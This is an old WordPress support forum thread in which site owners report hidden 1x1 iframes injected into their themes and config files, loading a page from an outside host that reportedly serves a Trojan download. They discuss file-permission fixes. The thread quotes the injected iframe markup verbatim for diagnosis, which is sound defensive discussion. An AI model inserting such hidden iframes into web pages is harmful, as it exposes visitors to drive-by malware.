Have my sites been attacked?

  • nathanwburke

    (@nathanwburke)


    18 years, 2 months ago

    This morning after posting on one of my WordPress blogs, I noticed in the status bar that I was transmitting data to http://step57.info/traff/index.php
    Problem is: I have no idea how that got there. I went in and looked at a couple of my blogs, and 5 of 8 of them had the following code:
    [code]<iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe>[/code]

    in the header, footer, and body. I have no idea where this came from. Has anyone seen this before? I can’t find any info on this through Google.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Mark (podz)

    (@podz)

    18 years, 2 months ago

    My bet says your theme files were writable and that the server on which your site is on was compromised by a script kiddie.
    The hosts will probably deny it and blame WP.
    Change your file permissios to 644 if possible, including themes.

    pumpkinslayer

    (@pumpkinslayer)

    18 years, 2 months ago

    Nathanwburke, I had this same thing happen to me just the other day, but on my site that has WordPress Multiuser. So far I only spotted that it had added a file to /wp-inst/ and added the lines you mentioned to /wp-inst/wp-conig.php at the end of the file.

    My friend who has a blog on my site alerted me to the problem when he got error messages on the site, but also a virus warning.

    Thanks Podz, for the suggestion, and I will do that to my site, but actually none of the themes were effected by the hack.

    UPDATE —

    Took podz advice on changing permissions, but for those with WPMU the wp-inst folder still needs to stay as 777, make absolutely sure that wp-config (which contains your database password) stays with the strictest permission, basically allowing only reading from the server is best, I think.

    gMk

    (@gmk)

    18 years, 2 months ago

    I had a similar incident – removed permission – things seemed to have returned to normal !

    jimnyc

    (@jimnyc)

    18 years, 1 month ago

    The same thing happened to my site. The active theme and one other both had the iframe code added past the body tag. The index.php it calls run javascript to download an app.wmf that Norton id’s as a Trojan download. Changing the file permissions has fixed it for now.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Have my sites been attacked?’ is closed to new replies.

Tags